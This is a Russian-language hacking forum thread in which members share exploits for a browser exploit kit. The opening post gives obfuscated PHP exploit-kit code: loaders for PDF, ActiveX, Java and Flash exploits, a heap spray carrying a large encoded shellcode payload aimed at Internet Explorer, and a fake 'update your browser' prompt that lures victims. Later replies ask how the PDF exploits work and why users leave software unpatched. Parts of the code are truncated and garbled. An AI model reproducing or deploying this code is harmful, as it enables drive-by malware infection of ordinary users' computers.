Предлогаю выкладывать сдесь актуальные сплойты которые можно воткнуть в связку.

Начну пожалуй:

IE 7

FireFox PDF

Opera PDF

IE PDF

PDF ALL

[PHP]
PHP:
[COLOR="#000000"]functionpdf_all()

{

global$pdf;

$O000000OO='document.write("");';

return$O000000OO;

}

//================================================== =======// PDF //================================================== =======//

functionactivex_pack()

{

global$load,$url;

$O000000OO='



















sysWIN.url = "'.$load.'?spl=ActiveX_pack"

sysWIN.fontsize = 10

sysWIN.barcolor = 00FF00

sysWIN.start = "start"

';

return$O000000OO;

}

functionjava_exec()

{

global$load;

$url=$load."?spl=javar";

$url=base64_encode($url);

$O000000OO='









';

return$O000000OO;

}

functionnext_spl($refr)

{

global$O0000000O,$OOOOOO000,$OOOOO0000,$OOOO00000;

$O0000000O++;

$O000000OO='

function dorefresh(){

window.location="?spl='.$O0000000O.'&br='.$OOOOOO000.'&vers='.$OOOOO0000[2].'&s='.$OOOO00000.'";

}

setTimeout("dorefresh();",'.$refr.'000);

';

return$O000000OO;

}

functionflash10()

{

global$url;

$content='

function flash_version(){

var d, n = navigator, m, f = \'Sho ckwave Flash\';

if((m = n.mimeTypes) && (m = m["application/x-shockwave-flash"]) && m.enabledPlugin && (n = n.plugins) &&� �n[f]) {d = n[f].description}

else if (window.ActiveXObject) { try { d = (new ActiveXObject((f+\'.\'+f).replace(/ /g,\'\'))).GetVariable(\'$version\');} catch (e)� �{}}

return d ? d.replace(/\D+/,\'\').split(/\D+/) : [0,0];

}

function start_flash(){

document.write(\'\');

var memory;

var nop = unescape("%u0c0c%u0c0c");

var SC=unescape('._shellcode("flash").');

while(nop.length \');

}

}

if (flash_version()[0] == "9")

{

if (flash_version()[2]

function fakes()

{

if (confirm("Warning! Your browser is old. \ n please install the update")) {

parent.location="soc.php";



}

else {





}

}

fakes();

';

if ($soc_pack=="0"){$xxx='';}

else$xxx=$O000000OO;

return$xxx;

}

functionnewie()

{

$O000000OO=[COLOR="#DD0000"]'

function LoaD(){ document.getElementsByTagName(\ 'STYLE\')[0].outerHTML++; }

function HeapSpray(){

var unspacese = unescape;

var shellcode = unspacese("%uf527%uf940%u4991%u f59b%uf591%uf593%u3743%u4793%ufd96%u97d6%u4b97%u90 46%u4643%u4296%u4f98%u4241%u929f%u4793%u4f41%u47f8 %uf89b%u9f4b%u4ff8%u424f%u4099%u484e%u924b%u91fc%u f897%ufc90%u4a4e%ufd43%u9137%ufd9f%uf847%u48fc%u42 42%uf599%u4bfd%ud69b%u9b42%u379b%u4092%u4ed6%u374b %u37f5%ufcd6%u4f41%u9291%u3749%u2797%u92d6%u2792%u 41f8%u9741%u4048%u4143%u9f4b%u4a9b%u4296%u9b48%u92 49%u4648%u9b4a%ufc96%u2ff5%u9b99%u4791%ufc91%ud6f9 %u3791%uf527%u9b99%u374f%u969b%u9b4b%u40f8%u9b43%u 9149%u4a92%u4891%ud62f%u41d6%u4f98%u4f42%ufc9f%u90 90%u4a37%u9290%u4ad6%u9747%ufd49%u914b%u924e%u4f90 %u4848%u43fc%u4040%u9941%u2743%u98f8%u3f47%u4892%u 964a%ud637%u4a91%u49fc%u932f%uf527%u4646%u4990%u91 96%ufc47%ud690%u9298%uf5f8%u91f9%u47f9%u4637%u99fc %u404f%u4048%u9246%u9947%u4e4e%u4a27%u9b96%u4bfc%u 3f96%u49f8%u2f4f%u9b4f%ud693%uf84a%u90d6%u4391%ufc 3f%u4342%u962f%u404f%u974a%ud69f%uf8f9%u4240%u9798 %ufc93%u4947%ufd4b%u4240%u4b97%u4f37%u4e96%u4f96%u 962f%u3741%u37f5%u4f42%uf84e%u9190%ufc90%u4e99%ufd 4f%ufd9f%u4a47%u4e3f%ufc9b%u2f4b%u9393%ud63f%u4297 %ufd93%u3f40%u4747%u9897%ufd46%u9396%u4392%u374b%u 4743%ufc37%uf543%uf890%u4af9%u973f%u92f5%u27f9%u98 91%u2fd6%ufc46%u4347%u4f91%u40f8%u4b96%u93f8%u9696 %u472f%u9646%u3ff5%u9646%u9f43%u4296%u9340%u429b%u 91fd%u464a%u49f9%u9b37%u4ad6%u47f9%u9f48%u37fd%u43 91%u494f%u914b%ufc4a%u929b%u279f%uf52f%u4699%u96f5 %u9f43%u4e27%u9927%u4a93%u922f%u4648%u4e9f%u4793%u 4afc%uf837%ufc40%ufd4e%u96fd%u4a98%ufc3f%ufd4f%u4f fc%u3f4e%u92fc%u409b%u9140%u4640%u4697%u4b47%u4f90 %u9f49%u2f41%u4190%ud69b%u37fc%u274f%u2f4f%u4f9f%u 2f48%u4e40%u3f4a%u4f93%ufd97%u9b4b%u2748%u9999%u4f 9f%u9292%u379b%u4f90%u93fc%u4f4b%u2793%u3793%u2f43 %uf897%u414e%uf927%u4297%uf948%uf54b%u4afc%u9748%u 2f2f%u9f46%uf94b%u3799%u9946%u4047%u494b%u9ff5%uf9 96%u492f%u3f93%u2ffc%u489f%u9843%u3f4e%u9848%ufd41 %uf94b%u42fd%ud642%u372f%u42f9%ufd4e%u9f41%u4047%u 4b2f%u964a%u4f2f%u97fc%u424b%u2740%u9bd6%u9341%u49 4f%ud6d6%u9147%u49fc%u4b4a%u92f5%uf54b%u4e4f%u3f4f %ufd99%u9bf8%u2797%u2f93%u9197%u2f42%u3f2f%u2742%u 9b4e%u42f5%u4143%uf896%u484f%ud647%u272f%u96fc%u93 49%u4697%uf597%uf83f%u2f97%u9198%u4193%u429f%u4b48 %u4349%u914e%u2fd6%u9b2f%u4f98%u9b93%u4827%u4698%u 4a9f%uf54b%u4f47%u9f9b%u924f%u9143%u9642%u91f8%uf5 49%u9992%u9327%uf8f5%u4691%u91fc%u9237%u46fd%u3f92 %ud646%u3f49%u37f9%u4999%u9692%u4a9f%u902f%u929b%u 4698%u4f91%u9393%u4342%u4837%u3348%ub1c9%uba34%ubf e7%ub4f5%uc4d9%u74d9%uf424%u315e%u1056%uc683%u0304 %u0c56%u4a05%u7074%u479d%u8688%u40e1%u79fe%u9119%u f361%ua0fc%u67b3%u9075%ue303%u19db%ua1ef%uaacf%u6d 9d%u1be0%u482b%u9ccf%u549d%u5f83%u28bf%ub3d9%u101f %uc612%u555e%u294e%u0e32%u9805%u3ba3%u215b%uebc5%u 19d0%u8ebd%ued26%u9077%u5e76%uda03%ud46e%ufb4b%u39 8f%uc788%u36c6%ub37b%u9ed9%u3cb5%udee8%u031a%ud2c5 %u4363%u0ce1%ubf16%ub012%u0421%u6e69%u99a7%ue5c9%u 7a1f%u2ae8%u09f9%u87e6%u568d%u16ea%ued41%u9216%u22 64%ue09f%ue642%ub3c4%ubfeb%u12a0%udf13%uca0c%uabb1 %u1fbe%uf1c3%uded4%u8c41%ue191%u8f59%u89b1%u0468%u cd5e%ucf74%u311b%uda97%uda51%u8f0e%u87d8%u65b0%ube 1e%u8c32%u45de%ue52a%u02db%u15ec%u1b91%u1999%u1b06 %u7988%u8fc9%u5050%u286c%uacf2");

var bigblock = unspacese( "%" + "u" + "0"� �+ "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );

var headersize = 20 + shellcode.length;

while (bigblock.length

Легендарный PDF libbtiff на данный момент входит во все приват связки эксплойтов!!

эксплойт под IE 7 у меня не пахает

а как устроены pdf экспы... надо еще подсоединить pdf с включеным в него шелкодом?

и как я понял он бьет adobe acrobat который поддерживает работу с браузерами. и с какой версии это работает? не во всех же версиях есть поддержка браузера.

и кстати я плохо понимаю почему юзеры не обновляют свое ПО. ведь оно обновляется автоматически... что они все нажимают отмена когда начинается обновление

даже пиратская винда сама обновляется.... включая IE который тоже обновляется, но почемуто до сих пор остаются старые версии